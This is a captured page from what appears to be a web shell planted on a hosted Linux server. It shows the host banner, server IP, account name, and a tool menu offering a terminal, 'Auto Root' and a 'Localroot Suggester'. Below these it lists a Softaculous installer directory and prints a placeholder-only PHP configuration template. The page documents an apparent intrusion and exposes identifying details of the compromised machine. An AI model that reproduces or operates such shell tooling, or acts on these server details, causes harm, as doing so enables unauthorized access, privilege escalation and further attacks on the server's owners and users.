Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
tine /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php53
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php56
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php71
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php81
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php82
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
clone.php
4.09
KB
-rwxr-xr-x
2024-05-02 08:49
config.inc.php
1.37
KB
-rwxr-xr-x
2021-12-23 06:54
edit.php
4.38
KB
-rwxr-xr-x
2024-05-02 08:49
edit.xml
433
B
-rwxr-xr-x
2021-12-23 06:54
fileindex.php
332
B
-rwxr-xr-x
2021-12-23 06:54
import.php
3.33
KB
-rwxr-xr-x
2024-05-02 08:49
info.xml
3.22
KB
-rwxr-xr-x
2024-05-02 06:25
install.js
921
B
-rwxr-xr-x
2021-12-23 06:54
install.php
6.26
KB
-rwxr-xr-x
2024-05-02 08:49
install.xml
820
B
-rwxr-xr-x
2021-12-23 06:54
md5
2.66
KB
-rwxr-xr-x
2024-05-02 08:49
notes.txt
1.42
KB
-rwxr-xr-x
2022-01-10 06:47
Save
Rename
<?php // NOTE: You can either: // - copy this file to config.inc.php and add change config values // - create an empty config.inc.php, make it writeable to the webserver and edit config via the setup.php interface // - make this directory temporary writeable to the webserver and edit config via the setup.php interface // minimal configuration return array( // set 'count' equal zero to disable captcha, or set to number of invalid logins before request captcha. 'captcha' => array('count'=>0), 'database' => array( 'host' => '[[softdbhost]]', 'dbname' => '[[softdb]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'adapter' => 'pdo_mysql', 'tableprefix' => '[[dbprefix]]', ), 'setupuser' => array( 'username' => '[[admin_username]]', 'password' => '[[admin_setup_pass]]' ), 'tmpdir' => '[[softdatadir]]/tmp', 'filesdir' => '[[softdatadir]]/files', /* // optional cache (recommended) 'caching' => array ( 'active' => true, 'path' => 'PATH TO CACHE (NEEDS TO BE WRITEABLE BY WEBSERVER)', 'lifetime' => 3600, ), */ /* // optional logger 'logger' => array ( 'active' => true, 'filename' => 'LOG FILE (NEEDS TO BE WRITEABLE BY WEBSERVER)', 'priority' => '7', ), */ );